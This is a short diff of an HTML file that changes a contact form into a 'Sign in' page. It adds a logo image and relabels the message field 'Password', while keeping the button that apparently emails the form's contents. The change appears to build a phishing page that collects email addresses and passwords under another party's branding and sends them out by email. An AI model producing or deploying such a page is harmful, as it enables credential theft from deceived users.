--- a/index.html
+++ b/index.html
@@ -7,13 +7,14 @@
 </head>
 <body>
 
-  <h1>Contact Form</h1>
+  <img src="uio.png" alt="Logo" width="100" height="100">
+  <h1>Sign in</h1>
 
   <form id="myForm">
     <label>Email:</label>
     <input type="email" name="user_email">
     
-    <label>Message:</label>
+    <label>Password:</label>
     <textarea name="message"></textarea>
     
     <button type="button" onclick="sendEmail()">Send</button>
